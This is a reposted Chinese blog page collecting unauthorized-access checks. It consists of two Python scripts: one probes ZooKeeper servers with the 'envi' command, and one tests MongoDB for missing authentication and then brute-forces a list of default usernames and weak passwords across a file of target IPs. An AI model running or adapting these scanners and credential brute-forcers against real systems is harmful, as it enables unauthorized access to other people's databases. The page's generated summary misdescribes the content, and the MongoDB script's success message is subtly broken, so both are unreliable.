未授权访问整理

最新推荐文章于 2024-08-03 18:57:59 发布

转载最新推荐文章于 2024-08-03 18:57:59 发布 · 355 阅读

0 ·

CC 4.0 BY-SA版权

原文链接：http://www.cnblogs.com/AtesetEnginner/p/11038269.html

文章标签：

#大数据 #数据库 #python

此博客转载自相关链接，标签涉及大数据、数据库和Python，推测内容围绕Python在大数据和数据库领域的应用展开，但原文未提供具体内容。

摘要生成于 C知道，由 DeepSeek-R1 满血版支持，前往体验 >

 1 #zookeeper Python3
 2 
 3 #-*- coding: utf-8 -*-
 4 
 5 import socket
 6 
 7 def verify(protocol,ip,port):
 8     url = ip+':'+str(port)
 9     print('testing if zookeeper unanth vul')
10     try:
11         socket.setdefaulttimeout(3)
12         s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
13         s.connect((ip, int(port)))
14         flag = b"envi"
15         s.send(flag)
16         data = s.recv(1024)
17         s.close()
18         if b'Environment' in data:
19             msg = 'There is zookeeper unanth vul on url: ' + url + ' .'
20             print(msg)
21             number = 'v90'
22             return True, url, number, msg
23         else:
24             pass
25     except Exception as e:
26         print(str(e))
27     msg = 'There is no zookeeper unanth vul.'
28     number = 'v0'
29     return False, url, number, msg
30 
31 if __name__ == '__main__':
32     res = verify('http','xx.116.40.xx',2181)
33     print(res)

 1 #Mongodb
 2 # -*- coding:utf-8 -*-
 3 
 4 import pymongo
 5 from pymongo.errors import ServerSelectionTimeoutError
 6 
 7 def verify(ip,port):
 8     host = ip+':'+str(port)
 9     port = int(port)
10     loginnames = ['admin','test','user','root']
11     passwd = ['','123456','test','12345678','12345679','root','123456Aa','123456_Aa','123456aA','123456_aA','123QWEASD','admin123','admin','1q2w3e4r','134679']
12     print('testing if mongodb vul')
13     #是否无认证
14     try:
15         connection = pymongo.MongoClient(ip,port,serverSelectionTimeoutMS=1000)
16         dbs = connection.database_names()
17         msg = 'There is a mongodb unauthorized access , password is None'
18         number = 'v9'
19         print(dbs)
20         return True,host,number,msg        
21      #端口连不上,直接退出
22     except ServerSelectionTimeoutError as e:
23         msg = str(e)
24         number = 'v0'
25         return False,host,number,msg
26     except Exception as e:
27         msg = str(e)
28         number = 'v0'
29     #爆破
30     for loginname in loginnames:
31         for ps in passwd:           
32             try:
33                 connection.api.authenticate(loginname,ps)
34                 dbs = connection.database_names()
35                 msg = 'There is a mongodb unauthorized access , username/password is %s' %(loginname,ps)
36                 number = 'v9'
37                 print(msg)
38                 return True,host,number,msg
39             except Exception as e:
40                 msg = str(e)
41                 number = 'v0'
42     return False,host,number,msg
43 
44 if __name__ == '__main__':
45         def get_pass_dict():
46             pass_dict = []
47             with open('./IP.txt', 'r') as f:
48                 for line in f.readlines():
49                     line = line.strip('\n')
50                     pass_dict.append(line)
51                 f.close()
52             return pass_dict
53         IP = get_pass_dict()
54         for ip in IP:
55             port = '27017'
56             res = verify(ip, port)
57             print(res)